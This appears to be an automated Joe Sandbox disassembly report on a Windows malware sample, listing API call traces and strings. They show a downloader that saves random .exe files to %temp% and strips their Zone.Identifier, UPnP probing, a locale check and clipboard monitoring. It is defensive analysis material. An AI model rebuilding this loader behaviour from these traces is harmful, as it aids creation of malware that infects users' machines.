                                                                                  • Part of subcall function 0040D5E0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D5FE
                                                                                • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                • setsockopt.WS2_32 ref: 004020D1
                                                                                • htons.WS2_32(?), ref: 00402101
                                                                                • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                  • Part of subcall function 0040D610: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D610: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                  • Part of subcall function 0040D610: DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                  • Part of subcall function 0040D610: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                • String ID:
                                                                                • API String ID: 1603358586-0
                                                                                • Opcode ID: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
                                                                                • Instruction ID: 3d527d3106709ffe12c11fbc149f9fb6bead9182873b01420bf0fd5d4f043c35
                                                                                • Opcode Fuzzy Hash: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
                                                                                • Instruction Fuzzy Hash: C441B070640301BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E445C75A
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                • htons.WS2_32(0000076C), ref: 0040DC10
                                                                                • inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040AF30: htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AF30: socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                  • Part of subcall function 0040AF30: connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                  • Part of subcall function 0040AF30: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                • bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                • lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                • sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DD40: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                  • Part of subcall function 0040DD40: Sleep.KERNEL32(000003E8), ref: 0040DD9E
                                                                                  • Part of subcall function 0040DD40: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                  • Part of subcall function 0040DD40: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                  • Part of subcall function 0040DD40: StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                • String ID: 239.255.255.250
                                                                                • API String ID: 726339449-2186272203
                                                                                • Opcode ID: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction ID: ef7ed27ddc10e69a95ecf683d08ad8987f4418d9446925fcf09c3d01f5f265dc
                                                                                • Opcode Fuzzy Hash: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction Fuzzy Hash: 7141F8B4E10208ABDB14DFE4E889BEEBBB5EF48304F108169F505B7390E7B55A44CB59
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                • htons.WS2_32(?), ref: 00401508
                                                                                • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                • String ID:
                                                                                • API String ID: 4174406920-0
                                                                                • Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                                • Instruction ID: ddf1df2f5e3c49f21769c3cd8a86baa6c810c68bf5de7ecead628d1f617bc177
                                                                                • Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                                • Instruction Fuzzy Hash: 72319571A44301AFE320DF649C4AF9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040D1B2
                                                                                • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D1D8
                                                                                • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D20F
                                                                                • GetTickCount.KERNEL32 ref: 0040D224
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D244
                                                                                • GetTickCount.KERNEL32 ref: 0040D24A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Sleepioctlsocketrecv
                                                                                • String ID:
                                                                                • API String ID: 107502007-0
                                                                                • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction ID: d1d91ce4da814b9a63f0d024f91aac80a52589da6ae3f0e8ee31fa34877a49b5
                                                                                • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction Fuzzy Hash: 5A31CA74D00209EFCF04DFA4DA48AEE77B1FF44315F1086A9E825A7290D7749A94CB59
                                                                                APIs
                                                                                • htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AEF0: inet_addr.WS2_32(0040AF71), ref: 0040AEFA
                                                                                  • Part of subcall function 0040AEF0: gethostbyname.WS2_32(?), ref: 0040AF0D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                Strings
                                                                                • www.update.microsoft.com, xrefs: 0040AF67
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                • String ID: www.update.microsoft.com
                                                                                • API String ID: 4063137541-1705189816
                                                                                • Opcode ID: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction ID: 8d2b89a1e3841e6cd000a2b550c173cff20965c169263ef180e6ea1a6d777d84
                                                                                • Opcode Fuzzy Hash: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction Fuzzy Hash: D1213BB0E103099BCB04DFE8D946AEEBBB5AF08300F108169E504F7390E7745A44CBAA
                                                                                APIs
                                                                                • CryptAcquireContextW.ADVAPI32(~@,00000000,00000000,00000001,F0000040,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C343
                                                                                • CryptGenRandom.ADVAPI32(~@,?,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C359
                                                                                • CryptReleaseContext.ADVAPI32(~@,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C365
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID: ~@
                                                                                • API String ID: 1815803762-592544116
                                                                                • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction ID: 830194fa38359529e853ee3f0456384099f2f8dd9552bb81b1528bc6e0449336
                                                                                • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction Fuzzy Hash: B3E01275654208BBDB24CFE1EC49FDA776CAB48B00F108154FB09D7190DAB5EA409BA8
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DA0D,00000000), ref: 004013D5
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                • String ID:
                                                                                • API String ID: 3943618503-0
                                                                                • Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                                • Instruction ID: 1e7a4891c1a42a5318b19a32161f2d9e989c632f85172a1bcc985bb178a8dbbc
                                                                                • Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                                • Instruction Fuzzy Hash: 18119674A40710AFE3609F749C0AF877AE0AF04B14F50892DF699E62E1E2B49544878A
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040EBF3
                                                                                • strcmp.NTDLL ref: 0040EC02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocalestrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3191669094-64918367
                                                                                • Opcode ID: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction ID: 39a3b49c0f9cc0ba3e3bafda0df6f1f41861fe80aa697247161161d98fc04bc2
                                                                                • Opcode Fuzzy Hash: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction Fuzzy Hash: 9AE0CD3594830876DA1065A15C02BA6371C5711701F0000B5AF14A21C1E5765119926B
                                                                                 Control-flow Graph
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040EF99
                                                                                • srand.MSVCRT ref: 0040EFA0
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EFC0
                                                                                • strlen.NTDLL ref: 0040EFCA
                                                                                • mbstowcs.NTDLL ref: 0040EFE1
                                                                                • rand.MSVCRT ref: 0040EFE9
                                                                                • rand.MSVCRT ref: 0040EFFD
                                                                                • wsprintfW.USER32 ref: 0040F024
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F03A
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F069
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F098
                                                                                • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F0CB
                                                                                • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F0FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F10B
                                                                                • wsprintfW.USER32 ref: 0040F124
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F134
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F13F
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040F160
                                                                                • ExitProcess.KERNEL32 ref: 0040F188
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F19E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F1AB
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1B8
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1C5
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F1D0
                                                                                • rand.MSVCRT ref: 0040F1E5
                                                                                • Sleep.KERNEL32 ref: 0040F1FC
                                                                                • rand.MSVCRT ref: 0040F202
                                                                                • rand.MSVCRT ref: 0040F216
                                                                                • wsprintfW.USER32 ref: 0040F23D
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 0040F24D
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F267
                                                                                • wsprintfW.USER32 ref: 0040F287
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F297
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F2A2
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040F2C3
                                                                                • ExitProcess.KERNEL32 ref: 0040F2EA
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F2F9
                                                                                Strings
                                                                                • %temp%, xrefs: 0040EFBB
                                                                                • %s\%d%d.exe, xrefs: 0040F018
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F035
                                                                                • %s:Zone.Identifier, xrefs: 0040F118
                                                                                • %s\%d%d.exe, xrefs: 0040F231
                                                                                • %s:Zone.Identifier, xrefs: 0040F27B
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 3526668077-2417596247
                                                                                • Opcode ID: d61462c6eaf3bb37fe7557a11c84e855f2e164ce5b2d085cf383048d0c46b177
                                                                                • Instruction ID: 8d9dde5e83d6f5576f0fa95dcda068e4d807ca32b5c879c9ce831b2193034ea7
                                                                                • Opcode Fuzzy Hash: d61462c6eaf3bb37fe7557a11c84e855f2e164ce5b2d085cf383048d0c46b177
                                                                                • Instruction Fuzzy Hash: 7D91EBB5940318ABE720DB50DC49FEA3379AF88701F0485B9F609A51C1DABD9AC8CF59

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040B280: gethostname.WS2_32(?,00000100), ref: 0040B29C
                                                                                  • Part of subcall function 0040B280: gethostbyname.WS2_32(?), ref: 0040B2AE
                                                                                • strcmp.NTDLL ref: 0040B380
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynamegethostnamestrcmp
                                                                                • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                • API String ID: 2906596889-2213908610
                                                                                • Opcode ID: 0f5039163e3a60cdc16b03ecb7c0134fb67bf6b75b9fd7ee3961c739777e0be2
                                                                                • Instruction ID: 1e2a78016ab808788e4a3d10fbde234ca2a84306dd4339bbdfb36d09265cce6e
                                                                                • Opcode Fuzzy Hash: 0f5039163e3a60cdc16b03ecb7c0134fb67bf6b75b9fd7ee3961c739777e0be2
                                                                                • Instruction Fuzzy Hash: C76171B5940305A7DB00AB61EC46BAA3765AB10318F18847AFC05673C2F77DE664C6DF

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040192C
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                • GetTickCount.KERNEL32 ref: 004019F6
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                • GetTickCount.KERNEL32 ref: 00401A43
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 3345448188-3762367603
                                                                                • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction ID: 2c6eba30162642fa916e9f7e0fa03190df933f3dd928bdc23040f585d31ac0f6
                                                                                • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction Fuzzy Hash: 9E41F671600300ABCB209F74DC8CB9B77A9AF44720F14463DF995A72E1DB78E881CB99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E9C8
                                                                                • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EA18
                                                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EA2B
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EA64
                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EA9A
                                                                                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EAC5
                                                                                • HttpSendRequestA.WININET(00000000,00411FA0,000000FF,00009E34), ref: 0040EAEF
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EB2E
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040EB80
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBB1
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBBE
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                • API String ID: 2761394606-2217117414
                                                                                • Opcode ID: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction ID: 65d8e98dfcdbd5221f12c344ddab433f9c0af5994e8cd23f0dde2b718a24ef5d
                                                                                • Opcode Fuzzy Hash: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction Fuzzy Hash: 91512EB5901228ABDB26CF54CC54FE9B3BCAB48705F1485E9B60DA6280D7B86FC4CF54

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                                                                • SetClipboardViewer.USER32(?), ref: 00405968
                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                                                                • OpenClipboard.USER32(00000000), ref: 00405A17
                                                                                • GetClipboardData.USER32(00000000), ref: 00405A29
                                                                                • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                                                                • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                                                                • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                • String ID:
                                                                                • API String ID: 3549449529-0
                                                                                • Opcode ID: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
                                                                                • Instruction ID: ab6473899f09a2e4ce72b89913391a8d882f42dafbfb3729ae4d66df8233a766
                                                                                • Opcode Fuzzy Hash: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
